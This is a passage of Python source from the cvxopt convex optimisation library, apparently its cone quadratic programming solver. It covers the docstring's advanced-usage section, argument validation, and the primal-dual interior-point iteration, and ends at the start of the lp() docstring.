e = ( e_0, e_1, ..., e_N, e_{N+1}, ..., e_{M+N} )
is the identity vector in C. e_0 is an ml-vector of ones,
e_k, k = 1,..., N, is the unit vector (1,0,...,0) of length
mq[k], and e_k = vec(I) where I is the identity matrix of order
ms[k].
- 'dual slack': the smallest dual slack, sup {t | z >= t*e }.
If the exit status is 'optimal', then the primal and dual
infeasibilities are guaranteed to be less than
solvers.options['feastol'] (default 1e-7). The gap is less than
solvers.options['abstol'] (default 1e-7) or the relative gap is
less than solvers.options['reltol'] (default 1e-6).
Termination with status 'unknown' indicates that the algorithm
failed to find a solution that satisfies the specified tolerances.
In some cases, the returned solution may be fairly accurate. If
the primal and dual infeasibilities, the gap, and the relative gap
are small, then x, y, s, z are close to optimal.
Advanced usage.
Three mechanisms are provided to express problem structure.
1. The user can provide a customized routine for solving linear
equations (`KKT systems')
[ P A' G' ] [ ux ] [ bx ]
[ A 0 0 ] [ uy ] = [ by ].
[ G 0 -W'*W ] [ uz ] [ bz ]
W is a scaling matrix, a block diagonal mapping
W*u = ( W0*u_0, ..., W_{N+M}*u_{N+M} )
defined as follows.
- For the 'l' block (W_0):
W_0 = diag(d),
with d a positive vector of length ml.
- For the 'q' blocks (W_{k+1}, k = 0, ..., N-1):
W_{k+1} = beta_k * ( 2 * v_k * v_k' - J )
where beta_k is a positive scalar, v_k is a vector in R^mq[k]
with v_k[0] > 0 and v_k'*J*v_k = 1, and J = [1, 0; 0, -I].
- For the 's' blocks (W_{k+N}, k = 0, ..., M-1):
W_k * u = vec(r_k' * mat(u) * r_k)
where r_k is a nonsingular matrix of order ms[k], and mat(x) is
the inverse of the vec operation.
The optional argument kktsolver is a Python function that will be
called as g = kktsolver(W). W is a dictionary that contains
the parameters of the scaling:
- W['d'] is a positive 'd' matrix of size (ml,1).
- W['di'] is a positive 'd' matrix with the elementwise inverse of
W['d'].
- W['beta'] is a list [ beta_0, ..., beta_{N-1} ]
- W['v'] is a list [ v_0, ..., v_{N-1} ]
- W['r'] is a list [ r_0, ..., r_{M-1} ]
- W['rti'] is a list [ rti_0, ..., rti_{M-1} ], with rti_k the
inverse of the transpose of r_k.
The call g = kktsolver(W) should return a function g that solves
the KKT system by g(x, y, z). On entry, x, y, z contain the
righthand side bx, by, bz. On exit, they contain the solution,
with uz scaled, the argument z contains W*uz. In other words,
on exit x, y, z are the solution of
[ P A' G'*W^{-1} ] [ ux ] [ bx ]
[ A 0 0 ] [ uy ] = [ by ].
[ G 0 -W' ] [ uz ] [ bz ]
2. The linear operators P*u, G*u and A*u can be specified
by providing Python functions instead of matrices. This can only
be done in combination with 1. above, i.e., it requires the
kktsolver argument.
If P is a function, the call P(u, v, alpha, beta) should evaluate
the matrix-vectors product
v := alpha * P * u + beta * v.
The arguments u and v are required. The other arguments have
default values alpha = 1.0, beta = 0.0.
If G is a function, the call G(u, v, alpha, beta, trans) should
evaluate the matrix-vector products
v := alpha * G * u + beta * v if trans is 'N'
v := alpha * G' * u + beta * v if trans is 'T'.
The arguments u and v are required. The other arguments have
default values alpha = 1.0, beta = 0.0, trans = 'N'.
If A is a function, the call A(u, v, alpha, beta, trans) should
evaluate the matrix-vectors products
v := alpha * A * u + beta * v if trans is 'N'
v := alpha * A' * u + beta * v if trans is 'T'.
The arguments u and v are required. The other arguments
have default values alpha = 1.0, beta = 0.0, trans = 'N'.
3. Instead of using the default representation of the primal
variable x and the dual variable y as one-column 'd' matrices,
we can represent these variables and the corresponding parameters
q and b by arbitrary Python objects (matrices, lists, dictionaries,
etc). This can only be done in combination with 1. and 2. above,
i.e., it requires a user-provided KKT solver and an operator
description of the linear mappings. It also requires the
arguments xnewcopy, xdot, xscal, xaxpy, ynewcopy, ydot, yscal,
yaxpy. These arguments are functions defined as follows.
If X is the vector space of primal variables x, then:
- xnewcopy(u) creates a new copy of the vector u in X.
- xdot(u, v) returns the inner product of two vectors u and v in X.
- xscal(alpha, u) computes u := alpha*u, where alpha is a scalar
and u is a vector in X.
- xaxpy(u, v, alpha = 1.0) computes v := alpha*u + v for a scalar
alpha and two vectors u and v in X.
If this option is used, the argument q must be in the same format
as x, the argument P must be a Python function, the arguments A
and G must be Python functions or None, and the argument
kktsolver is required.
If Y is the vector space of primal variables y:
- ynewcopy(u) creates a new copy of the vector u in Y.
- ydot(u, v) returns the inner product of two vectors u and v in Y.
- yscal(alpha, u) computes u := alpha*u, where alpha is a scalar
and u is a vector in Y.
- yaxpy(u, v, alpha = 1.0) computes v := alpha*u + v for a scalar
alpha and two vectors u and v in Y.
If this option is used, the argument b must be in the same format
as y, the argument A must be a Python function or None, and the
argument kktsolver is required.
Control parameters.
The following control parameters can be modified by adding an
entry to the dictionary options.
options['show_progress'] True/False (default: True)
options['maxiters'] positive integer (default: 100)
options['refinement'] nonnegative integer (default: 0 for problems
with no second-order cone and matrix inequality constraints;
1 otherwise)
options['abstol'] scalar (default: 1e-7)
options['reltol'] scalar (default: 1e-6)
options['feastol'] scalar (default: 1e-7).
"""
import math
from cvxopt import base, blas, misc
from cvxopt.base import matrix, spmatrix
STEP = 0.99
EXPON = 3
options = kwargs.get('options',globals()['options'])
DEBUG = options.get('debug',False)
KKTREG = options.get('kktreg',None)
if KKTREG is None:
pass
elif not isinstance(KKTREG,(float,int,long)) or KKTREG < 0.0:
raise ValueError("options['kktreg'] must be a nonnegative scalar")
# Use Mehrotra correction or not.
correction = options.get('use_correction', True)
MAXITERS = options.get('maxiters',100)
if not isinstance(MAXITERS,(int,long)) or MAXITERS < 1:
raise ValueError("options['maxiters'] must be a positive integer")
ABSTOL = options.get('abstol',1e-7)
if not isinstance(ABSTOL,(float,int,long)):
raise ValueError("options['abstol'] must be a scalar")
RELTOL = options.get('reltol',1e-6)
if not isinstance(RELTOL,(float,int,long)):
raise ValueError("options['reltol'] must be a scalar")
if RELTOL <= 0.0 and ABSTOL <= 0.0 :
raise ValueError("at least one of options['reltol'] and " \
"options['abstol'] must be positive")
FEASTOL = options.get('feastol',1e-7)
if not isinstance(FEASTOL,(float,int,long)) or FEASTOL <= 0.0:
raise ValueError("options['feastol'] must be a positive scalar")
show_progress = options.get('show_progress',True)
if kktsolver is None:
if dims and (dims['q'] or dims['s']):
kktsolver = 'chol'
else:
kktsolver = 'chol2'
defaultsolvers = ('ldl', 'ldl2', 'chol', 'chol2')
if isinstance(kktsolver,str) and kktsolver not in defaultsolvers:
raise ValueError("'%s' is not a valid value for kktsolver" \
%kktsolver)
# Argument error checking depends on level of customization.
customkkt = not isinstance(kktsolver,str)
matrixP = isinstance(P, (matrix, spmatrix))
matrixG = isinstance(G, (matrix, spmatrix))
matrixA = isinstance(A, (matrix, spmatrix))
if (not matrixP or (not matrixG and G is not None) or
(not matrixA and A is not None)) and not customkkt:
raise ValueError("use of function valued P, G, A requires a "\
"user-provided kktsolver")
customx = (xnewcopy != None or xdot != None or xaxpy != None or
xscal != None)
if customx and (matrixP or matrixG or matrixA or not customkkt):
raise ValueError("use of non-vector type for x requires "\
"function valued P, G, A and user-provided kktsolver")
customy = (ynewcopy != None or ydot != None or yaxpy != None or
yscal != None)
if customy and (matrixA or not customkkt):
raise ValueError("use of non vector type for y requires "\
"function valued A and user-provided kktsolver")
if not customx and (not isinstance(q,matrix) or q.typecode != 'd' or q.size[1] != 1):
raise TypeError("'q' must be a 'd' matrix with one column")
if matrixP:
if P.typecode != 'd' or P.size != (q.size[0], q.size[0]):
raise TypeError("'P' must be a 'd' matrix of size (%d, %d)"\
%(q.size[0], q.size[0]))
def fP(x, y, alpha = 1.0, beta = 0.0):
base.symv(P, x, y, alpha = alpha, beta = beta)
else:
fP = P
if h is None: h = matrix(0.0, (0,1))
if not isinstance(h, matrix) or h.typecode != 'd' or h.size[1] != 1:
raise TypeError("'h' must be a 'd' matrix with one column")
if not dims: dims = {'l': h.size[0], 'q': [], 's': []}
if not isinstance(dims['l'],(int,long)) or dims['l'] < 0:
raise TypeError("'dims['l']' must be a nonnegative integer")
if [ k for k in dims['q'] if not isinstance(k,(int,long)) or k < 1 ]:
raise TypeError("'dims['q']' must be a list of positive integers")
if [ k for k in dims['s'] if not isinstance(k,(int,long)) or k < 0 ]:
raise TypeError("'dims['s']' must be a list of nonnegative " \
"integers")
try: refinement = options['refinement']
except KeyError:
if dims['q'] or dims['s']: refinement = 1
else: refinement = 0
else:
if not isinstance(refinement,(int,long)) or refinement < 0:
raise ValueError("options['refinement'] must be a "\
"nonnegative integer")
cdim = dims['l'] + sum(dims['q']) + sum([ k**2 for k in dims['s'] ])
if h.size[0] != cdim:
raise TypeError("'h' must be a 'd' matrix of size (%d,1)" %cdim)
# Data for kth 'q' constraint are found in rows indq[k]:indq[k+1] of G.
indq = [ dims['l'] ]
for k in dims['q']: indq = indq + [ indq[-1] + k ]
# Data for kth 's' constraint are found in rows inds[k]:inds[k+1] of G.
inds = [ indq[-1] ]
for k in dims['s']: inds = inds + [ inds[-1] + k**2 ]
if G is None:
if customx:
def G(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
if trans == 'N': pass
else: xscal(beta, y)
else:
G = spmatrix([], [], [], (0, q.size[0]))
matrixG = True
if matrixG:
if G.typecode != 'd' or G.size != (cdim, q.size[0]):
raise TypeError("'G' must be a 'd' matrix of size (%d, %d)"\
%(cdim, q.size[0]))
def fG(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
misc.sgemv(G, x, y, dims, trans = trans, alpha = alpha,
beta = beta)
else:
fG = G
if A is None:
if customx or customy:
def A(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
if trans == 'N': pass
else: xscal(beta, y)
else:
A = spmatrix([], [], [], (0, q.size[0]))
matrixA = True
if matrixA:
if A.typecode != 'd' or A.size[1] != q.size[0]:
raise TypeError("'A' must be a 'd' matrix with %d columns" \
%q.size[0])
def fA(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
base.gemv(A, x, y, trans = trans, alpha = alpha, beta = beta)
else:
fA = A
if not customy:
if b is None: b = matrix(0.0, (0,1))
if not isinstance(b, matrix) or b.typecode != 'd' or b.size[1] != 1:
raise TypeError("'b' must be a 'd' matrix with one column")
if matrixA and b.size[0] != A.size[0]:
raise TypeError("'b' must have length %d" %A.size[0])
if b is None and customy:
raise ValueEror("use of non-vector type for y requires b")
ws3, wz3 = matrix(0.0, (cdim,1 )), matrix(0.0, (cdim,1 ))
def res(ux, uy, uz, us, vx, vy, vz, vs, W, lmbda):
# Evaluates residual in Newton equations:
#
# [ vx ] [ vx ] [ 0 ] [ P A' G' ] [ ux ]
# [ vy ] := [ vy ] - [ 0 ] - [ A 0 0 ] * [ uy ]
# [ vz ] [ vz ] [ W'*us ] [ G 0 0 ] [ W^{-1}*uz ]
#
# vs := vs - lmbda o (uz + us).
# vx := vx - P*ux - A'*uy - G'*W^{-1}*uz
fP(ux, vx, alpha = -1.0, beta = 1.0)
fA(uy, vx, alpha = -1.0, beta = 1.0, trans = 'T')
blas.copy(uz, wz3)
misc.scale(wz3, W, inverse = 'I')
fG(wz3, vx, alpha = -1.0, beta = 1.0, trans = 'T')
# vy := vy - A*ux
fA(ux, vy, alpha = -1.0, beta = 1.0)
# vz := vz - G*ux - W'*us
fG(ux, vz, alpha = -1.0, beta = 1.0)
blas.copy(us, ws3)
misc.scale(ws3, W, trans = 'T')
blas.axpy(ws3, vz, alpha = -1.0)
# vs := vs - lmbda o (uz + us)
blas.copy(us, ws3)
blas.axpy(uz, ws3)
misc.sprod(ws3, lmbda, dims, diag = 'D')
blas.axpy(ws3, vs, alpha = -1.0)
# kktsolver(W) returns a routine for solving
#
# [ P A' G'*W^{-1} ] [ ux ] [ bx ]
# [ A 0 0 ] [ uy ] = [ by ].
# [ G 0 -W' ] [ uz ] [ bz ]
if kktsolver in defaultsolvers:
if KKTREG is None and b.size[0] > q.size[0]:
raise ValueError("Rank(A) < p or Rank([P; G; A]) < n")
if kktsolver == 'ldl':
factor = misc.kkt_ldl(G, dims, A, kktreg = KKTREG)
elif kktsolver == 'ldl2':
factor = misc.kkt_ldl2(G, dims, A)
elif kktsolver == 'chol':
factor = misc.kkt_chol(G, dims, A)
else:
factor = misc.kkt_chol2(G, dims, A)
def kktsolver(W):
return factor(W, P)
if xnewcopy is None: xnewcopy = matrix
if xdot is None: xdot = blas.dot
if xaxpy is None: xaxpy = blas.axpy
if xscal is None: xscal = blas.scal
def xcopy(x, y):
xscal(0.0, y)
xaxpy(x, y)
if ynewcopy is None: ynewcopy = matrix
if ydot is None: ydot = blas.dot
if yaxpy is None: yaxpy = blas.axpy
if yscal is None: yscal = blas.scal
def ycopy(x, y):
yscal(0.0, y)
yaxpy(x, y)
resx0 = max(1.0, math.sqrt(xdot(q,q)))
resy0 = max(1.0, math.sqrt(ydot(b,b)))
resz0 = max(1.0, misc.snrm2(h, dims))
if cdim == 0:
# Solve
#
# [ P A' ] [ x ] [ -q ]
# [ ] [ ] = [ ].
# [ A 0 ] [ y ] [ b ]
try: f3 = kktsolver({'d': matrix(0.0, (0,1)), 'di':
matrix(0.0, (0,1)), 'beta': [], 'v': [], 'r': [], 'rti': []})
except ArithmeticError:
raise ValueError("Rank(A) < p or Rank([P; A; G]) < n")
x = xnewcopy(q)
xscal(-1.0, x)
y = ynewcopy(b)
f3(x, y, matrix(0.0, (0,1)))
# dres = || P*x + q + A'*y || / resx0
rx = xnewcopy(q)
fP(x, rx, beta = 1.0)
pcost = 0.5 * (xdot(x, rx) + xdot(x, q))
fA(y, rx, beta = 1.0, trans = 'T')
dres = math.sqrt(xdot(rx, rx)) / resx0
# pres = || A*x - b || / resy0
ry = ynewcopy(b)
fA(x, ry, alpha = 1.0, beta = -1.0)
pres = math.sqrt(ydot(ry, ry)) / resy0
if pcost == 0.0: relgap = None
else: relgap = 0.0
return { 'status': 'optimal', 'x': x, 'y': y, 'z':
matrix(0.0, (0,1)), 's': matrix(0.0, (0,1)),
'gap': 0.0, 'relative gap': 0.0,
'primal objective': pcost,
'dual objective': pcost,
'primal slack': 0.0, 'dual slack': 0.0,
'primal infeasibility': pres, 'dual infeasibility': dres,
'iterations': 0 }
x, y = xnewcopy(q), ynewcopy(b)
s, z = matrix(0.0, (cdim, 1)), matrix(0.0, (cdim, 1))
if initvals is None:
# Factor
#
# [ P A' G' ]
# [ A 0 0 ].
# [ G 0 -I ]
W = {}
W['d'] = matrix(1.0, (dims['l'], 1))
W['di'] = matrix(1.0, (dims['l'], 1))
W['v'] = [ matrix(0.0, (m,1)) for m in dims['q'] ]
W['beta'] = len(dims['q']) * [ 1.0 ]
for v in W['v']: v[0] = 1.0
W['r'] = [ matrix(0.0, (m,m)) for m in dims['s'] ]
W['rti'] = [ matrix(0.0, (m,m)) for m in dims['s'] ]
for r in W['r']: r[::r.size[0]+1 ] = 1.0
for rti in W['rti']: rti[::rti.size[0]+1 ] = 1.0
try: f = kktsolver(W)
except ArithmeticError:
raise ValueError("Rank(A) < p or Rank([P; A; G]) < n")
# Solve
#
# [ P A' G' ] [ x ] [ -q ]
# [ A 0 0 ] * [ y ] = [ b ].
# [ G 0 -I ] [ z ] [ h ]
xcopy(q, x)
xscal(-1.0, x)
ycopy(b, y)
blas.copy(h, z)
try: f(x, y, z)
except ArithmeticError:
raise ValueError("Rank(A) < p or Rank([P; G; A]) < n")
blas.copy(z, s)
blas.scal(-1.0, s)
nrms = misc.snrm2(s, dims)
ts = misc.max_step(s, dims)
if ts >= -1e-8 * max(nrms, 1.0):
a = 1.0 + ts
s[:dims['l']] += a
s[indq[:-1]] += a
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
s[ind : ind+m*m : m+1] += a
ind += m**2
nrmz = misc.snrm2(z, dims)
tz = misc.max_step(z, dims)
if tz >= -1e-8 * max(nrmz, 1.0):
a = 1.0 + tz
z[:dims['l']] += a
z[indq[:-1]] += a
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
z[ind : ind+m*m : m+1] += a
ind += m**2
else:
if 'x' in initvals:
xcopy(initvals['x'], x)
else:
xscal(0.0, x)
if 's' in initvals:
blas.copy(initvals['s'], s)
# ts = min{ t | s + t*e >= 0 }
if misc.max_step(s, dims) >= 0:
raise ValueError("initial s is not positive")
else:
s[: dims['l']] = 1.0
ind = dims['l']
for m in dims['q']:
s[ind] = 1.0
ind += m
for m in dims['s']:
s[ind : ind + m*m : m+1] = 1.0
ind += m**2
if 'y' in initvals:
ycopy(initvals['y'], y)
else:
yscal(0.0, y)
if 'z' in initvals:
blas.copy(initvals['z'], z)
# tz = min{ t | z + t*e >= 0 }
if misc.max_step(z, dims) >= 0:
raise ValueError("initial z is not positive")
else:
z[: dims['l']] = 1.0
ind = dims['l']
for m in dims['q']:
z[ind] = 1.0
ind += m
for m in dims['s']:
z[ind : ind + m*m : m+1] = 1.0
ind += m**2
rx, ry, rz = xnewcopy(q), ynewcopy(b), matrix(0.0, (cdim, 1))
dx, dy = xnewcopy(x), ynewcopy(y)
dz, ds = matrix(0.0, (cdim, 1)), matrix(0.0, (cdim, 1))
lmbda = matrix(0.0, (dims['l'] + sum(dims['q']) + sum(dims['s']), 1))
lmbdasq = matrix(0.0, (dims['l'] + sum(dims['q']) + sum(dims['s']), 1))
sigs = matrix(0.0, (sum(dims['s']), 1))
sigz = matrix(0.0, (sum(dims['s']), 1))
if show_progress:
print("% 10s% 12s% 10s% 8s% 7s" %("pcost", "dcost", "gap", "pres",
"dres"))
gap = misc.sdot(s, z, dims)
for iters in range(MAXITERS + 1):
# f0 = (1/2)*x'*P*x + q'*x + r and rx = P*x + q + A'*y + G'*z.
xcopy(q, rx)
fP(x, rx, beta = 1.0)
f0 = 0.5 * (xdot(x, rx) + xdot(x, q))
fA(y, rx, beta = 1.0, trans = 'T')
fG(z, rx, beta = 1.0, trans = 'T')
resx = math.sqrt(xdot(rx, rx))
# ry = A*x - b
ycopy(b, ry)
fA(x, ry, alpha = 1.0, beta = -1.0)
resy = math.sqrt(ydot(ry, ry))
# rz = s + G*x - h
blas.copy(s, rz)
blas.axpy(h, rz, alpha = -1.0)
fG(x, rz, beta = 1.0)
resz = misc.snrm2(rz, dims)
# Statistics for stopping criteria.
# pcost = (1/2)*x'*P*x + q'*x
# dcost = (1/2)*x'*P*x + q'*x + y'*(A*x-b) + z'*(G*x-h)
# = (1/2)*x'*P*x + q'*x + y'*(A*x-b) + z'*(G*x-h+s) - z'*s
# = (1/2)*x'*P*x + q'*x + y'*ry + z'*rz - gap
pcost = f0
dcost = f0 + ydot(y, ry) + misc.sdot(z, rz, dims) - gap
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
pres = max(resy/resy0, resz/resz0)
dres = resx/resx0
if show_progress:
print("%2d: % 8.4e % 8.4e % 4.0e% 7.0e% 7.0e" \
%(iters, pcost, dcost, gap, pres, dres))
if ( pres <= FEASTOL and dres <= FEASTOL and ( gap <= ABSTOL or
(relgap is not None and relgap <= RELTOL) )) or \
iters == MAXITERS:
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
misc.symm(z, m, ind)
ind += m**2
ts = misc.max_step(s, dims)
tz = misc.max_step(z, dims)
if iters == MAXITERS:
if show_progress:
print("Terminated (maximum number of iterations "\
"reached).")
status = 'unknown'
else:
if show_progress:
print("Optimal solution found.")
status = 'optimal'
return { 'x': x, 'y': y, 's': s, 'z': z, 'status': status,
'gap': gap, 'relative gap': relgap,
'primal objective': pcost, 'dual objective': dcost,
'primal infeasibility': pres,
'dual infeasibility': dres, 'primal slack': -ts,
'dual slack': -tz , 'iterations': iters }
# Compute initial scaling W and scaled iterates:
#
# W * z = W^{-T} * s = lambda.
#
# lmbdasq = lambda o lambda.
if iters == 0: W = misc.compute_scaling(s, z, lmbda, dims)
misc.ssqr(lmbdasq, lmbda, dims)
# f3(x, y, z) solves
#
# [ P A' G' ] [ ux ] [ bx ]
# [ A 0 0 ] [ uy ] = [ by ].
# [ G 0 -W'*W ] [ W^{-1}*uz ] [ bz ]
#
# On entry, x, y, z containg bx, by, bz.
# On exit, they contain ux, uy, uz.
try: f3 = kktsolver(W)
except ArithmeticError:
if iters == 0:
raise ValueError("Rank(A) < p or Rank([P; A; G]) < n")
else:
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
misc.symm(z, m, ind)
ind += m**2
ts = misc.max_step(s, dims)
tz = misc.max_step(z, dims)
if show_progress:
print("Terminated (singular KKT matrix).")
return { 'x': x, 'y': y, 's': s, 'z': z,
'status': 'unknown', 'gap': gap,
'relative gap': relgap, 'primal objective': pcost,
'dual objective': dcost, 'primal infeasibility': pres,
'dual infeasibility': dres, 'primal slack': -ts,
'dual slack': -tz, 'iterations': iters }
# f4_no_ir(x, y, z, s) solves
#
# [ 0 ] [ P A' G' ] [ ux ] [ bx ]
# [ 0 ] + [ A 0 0 ] * [ uy ] = [ by ]
# [ W'*us ] [ G 0 0 ] [ W^{-1}*uz ] [ bz ]
#
# lmbda o (uz + us) = bs.
#
# On entry, x, y, z, s contain bx, by, bz, bs.
# On exit, they contain ux, uy, uz, us.
def f4_no_ir(x, y, z, s):
# Solve
#
# [ P A' G' ] [ ux ] [ bx ]
# [ A 0 0 ] [ uy ] = [ by ]
# [ G 0 -W'*W ] [ W^{-1}*uz ] [ bz - W'*(lmbda o\ bs) ]
#
# us = lmbda o\ bs - uz.
#
# On entry, x, y, z, s contains bx, by, bz, bs.
# On exit they contain x, y, z, s.
# s := lmbda o\ s
# = lmbda o\ bs
misc.sinv(s, lmbda, dims)
# z := z - W'*s
# = bz - W'*(lambda o\ bs)
blas.copy(s, ws3)
misc.scale(ws3, W, trans = 'T')
blas.axpy(ws3, z, alpha = -1.0)
# Solve for ux, uy, uz
f3(x, y, z)
# s := s - z
# = lambda o\ bs - uz.
blas.axpy(z, s, alpha = -1.0)
# f4(x, y, z, s) solves the same system as f4_no_ir, but applies
# iterative refinement.
if iters == 0:
if refinement or DEBUG:
wx, wy = xnewcopy(q), ynewcopy(b)
wz, ws = matrix(0.0, (cdim,1)), matrix(0.0, (cdim,1))
if refinement:
wx2, wy2 = xnewcopy(q), ynewcopy(b)
wz2, ws2 = matrix(0.0, (cdim,1)), matrix(0.0, (cdim,1))
def f4(x, y, z, s):
if refinement or DEBUG:
xcopy(x, wx)
ycopy(y, wy)
blas.copy(z, wz)
blas.copy(s, ws)
f4_no_ir(x, y, z, s)
for i in range(refinement):
xcopy(wx, wx2)
ycopy(wy, wy2)
blas.copy(wz, wz2)
blas.copy(ws, ws2)
res(x, y, z, s, wx2, wy2, wz2, ws2, W, lmbda)
f4_no_ir(wx2, wy2, wz2, ws2)
xaxpy(wx2, x)
yaxpy(wy2, y)
blas.axpy(wz2, z)
blas.axpy(ws2, s)
if DEBUG:
res(x, y, z, s, wx, wy, wz, ws, W, lmbda)
print("KKT residuals:")
print(" 'x': %e" %math.sqrt(xdot(wx, wx)))
print(" 'y': %e" %math.sqrt(ydot(wy, wy)))
print(" 'z': %e" %misc.snrm2(wz, dims))
print(" 's': %e" %misc.snrm2(ws, dims))
mu = gap / (dims['l'] + len(dims['q']) + sum(dims['s']))
sigma, eta = 0.0, 0.0
for i in [0, 1]:
# Solve
#
# [ 0 ] [ P A' G' ] [ dx ]
# [ 0 ] + [ A 0 0 ] * [ dy ] = -(1 - eta) * r
# [ W'*ds ] [ G 0 0 ] [ W^{-1}*dz ]
#
# lmbda o (dz + ds) = -lmbda o lmbda + sigma*mu*e (i=0)
# lmbda o (dz + ds) = -lmbda o lmbda - dsa o dza
# + sigma*mu*e (i=1) where dsa, dza
# are the solution for i=0.
# ds = -lmbdasq + sigma * mu * e (if i is 0)
# = -lmbdasq - dsa o dza + sigma * mu * e (if i is 1),
# where ds, dz are solution for i is 0.
blas.scal(0.0, ds)
if correction and i == 1:
blas.axpy(ws3, ds, alpha = -1.0)
blas.axpy(lmbdasq, ds, n = dims['l'] + sum(dims['q']),
alpha = -1.0)
ds[:dims['l']] += sigma*mu
ind = dims['l']
for m in dims['q']:
ds[ind] += sigma*mu
ind += m
ind2 = ind
for m in dims['s']:
blas.axpy(lmbdasq, ds, n = m, offsetx = ind2, offsety =
ind, incy = m + 1, alpha = -1.0)
ds[ind : ind + m*m : m+1] += sigma*mu
ind += m*m
ind2 += m
# (dx, dy, dz) := -(1 - eta) * (rx, ry, rz)
xscal(0.0, dx); xaxpy(rx, dx, alpha = -1.0 + eta)
yscal(0.0, dy); yaxpy(ry, dy, alpha = -1.0 + eta)
blas.scal(0.0, dz)
blas.axpy(rz, dz, alpha = -1.0 + eta)
try: f4(dx, dy, dz, ds)
except ArithmeticError:
if iters == 0:
raise ValueError("Rank(A) < p or Rank([P; A; G]) < n")
else:
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
misc.symm(z, m, ind)
ind += m**2
ts = misc.max_step(s, dims)
tz = misc.max_step(z, dims)
if show_progress:
print("Terminated (singular KKT matrix).")
return { 'x': x, 'y': y, 's': s, 'z': z,
'status': 'unknown', 'gap': gap,
'relative gap': relgap, 'primal objective': pcost,
'dual objective': dcost,
'primal infeasibility': pres,
'dual infeasibility': dres, 'primal slack': -ts,
'dual slack': -tz, 'iterations': iters }
dsdz = misc.sdot(ds, dz, dims)
# Save ds o dz for Mehrotra correction
if correction and i == 0:
blas.copy(ds, ws3)
misc.sprod(ws3, dz, dims)
# Maximum steps to boundary.
#
# If i is 1, also compute eigenvalue decomposition of the
# 's' blocks in ds,dz. The eigenvectors Qs, Qz are stored in
# dsk, dzk. The eigenvalues are stored in sigs, sigz.
misc.scale2(lmbda, ds, dims)
misc.scale2(lmbda, dz, dims)
if i == 0:
ts = misc.max_step(ds, dims)
tz = misc.max_step(dz, dims)
else:
ts = misc.max_step(ds, dims, sigma = sigs)
tz = misc.max_step(dz, dims, sigma = sigz)
t = max([ 0.0, ts, tz ])
if t == 0:
step = 1.0
else:
if i == 0:
step = min(1.0, 1.0 / t)
else:
step = min(1.0, STEP / t)
if i == 0:
sigma = min(1.0, max(0.0,
1.0 - step + dsdz/gap * step**2))**EXPON
eta = 0.0
xaxpy(dx, x, alpha = step)
yaxpy(dy, y, alpha = step)
# We will now replace the 'l' and 'q' blocks of ds and dz with
# the updated iterates in the current scaling.
# We also replace the 's' blocks of ds and dz with the factors
# Ls, Lz in a factorization Ls*Ls', Lz*Lz' of the updated variables
# in the current scaling.
# ds := e + step*ds for nonlinear, 'l' and 'q' blocks.
# dz := e + step*dz for nonlinear, 'l' and 'q' blocks.
blas.scal(step, ds, n = dims['l'] + sum(dims['q']))
blas.scal(step, dz, n = dims['l'] + sum(dims['q']))
ind = dims['l']
ds[:ind] += 1.0
dz[:ind] += 1.0
for m in dims['q']:
ds[ind] += 1.0
dz[ind] += 1.0
ind += m
# ds := H(lambda)^{-1/2} * ds and dz := H(lambda)^{-1/2} * dz.
#
# This replaced the 'l' and 'q' components of ds and dz with the
# updated iterates in the current scaling.
# The 's' components of ds and dz are replaced with
#
# diag(lmbda_k)^{1/2} * Qs * diag(lmbda_k)^{1/2}
# diag(lmbda_k)^{1/2} * Qz * diag(lmbda_k)^{1/2}
#
misc.scale2(lmbda, ds, dims, inverse = 'I')
misc.scale2(lmbda, dz, dims, inverse = 'I')
# sigs := ( e + step*sigs ) ./ lambda for 's' blocks.
# sigz := ( e + step*sigz ) ./ lmabda for 's' blocks.
blas.scal(step, sigs)
blas.scal(step, sigz)
sigs += 1.0
sigz += 1.0
blas.tbsv(lmbda, sigs, n = sum(dims['s']), k = 0, ldA = 1, offsetA
= dims['l'] + sum(dims['q']))
blas.tbsv(lmbda, sigz, n = sum(dims['s']), k = 0, ldA = 1, offsetA
= dims['l'] + sum(dims['q']))
# dsk := Ls = dsk * sqrt(sigs).
# dzk := Lz = dzk * sqrt(sigz).
ind2, ind3 = dims['l'] + sum(dims['q']), 0
for k in range(len(dims['s'])):
m = dims['s'][k]
for i in range(m):
blas.scal(math.sqrt(sigs[ind3+i]), ds, offset = ind2 + m*i,
n = m)
blas.scal(math.sqrt(sigz[ind3+i]), dz, offset = ind2 + m*i,
n = m)
ind2 += m*m
ind3 += m
# Update lambda and scaling.
misc.update_scaling(W, lmbda, ds, dz)
# Unscale s, z (unscaled variables are used only to compute
# feasibility residuals).
blas.copy(lmbda, s, n = dims['l'] + sum(dims['q']))
ind = dims['l'] + sum(dims['q'])
ind2 = ind
for m in dims['s']:
blas.scal(0.0, s, offset = ind2)
blas.copy(lmbda, s, offsetx = ind, offsety = ind2, n = m,
incy = m+1)
ind += m
ind2 += m*m
misc.scale(s, W, trans = 'T')
blas.copy(lmbda, z, n = dims['l'] + sum(dims['q']))
ind = dims['l'] + sum(dims['q'])
ind2 = ind
for m in dims['s']:
blas.scal(0.0, z, offset = ind2)
blas.copy(lmbda, z, offsetx = ind, offsety = ind2, n = m,
incy = m+1)
ind += m
ind2 += m*m
misc.scale(z, W, inverse = 'I')
gap = blas.dot(lmbda, lmbda)
def lp(c, G, h, A = None, b = None, kktsolver = None, solver = None, primalstart = None,
dualstart = None, **kwargs):
"""
Solves a pair of primal and dual LPs
minimize c'*x
subject to G*x + s = h
A*x = b
s >= 0
maximize -h'*z - b'*y
subject to G'*z + A'*y + c = 0
z >= 0.
Input arguments.
c is n x 1, G is m x n, h is m x 1, A is p x n, b is p x 1. G and
A must be dense or sparse 'd' matrices. c, h and b are dense 'd'
matrices with one column. The default values for A and b are
empty matrices with zero rows.
solver is None, 'glpk' or 'mosek'. The default solver (None)
uses the cvxopt conelp() function. The 'glpk' solver is the
simplex LP solver from GLPK. The 'mosek' solver is the LP solver
from MOSEK.
The arguments primalstart and dualstart are ignored when solver
is 'glpk' or 'mosek', and are optional when solver is None.
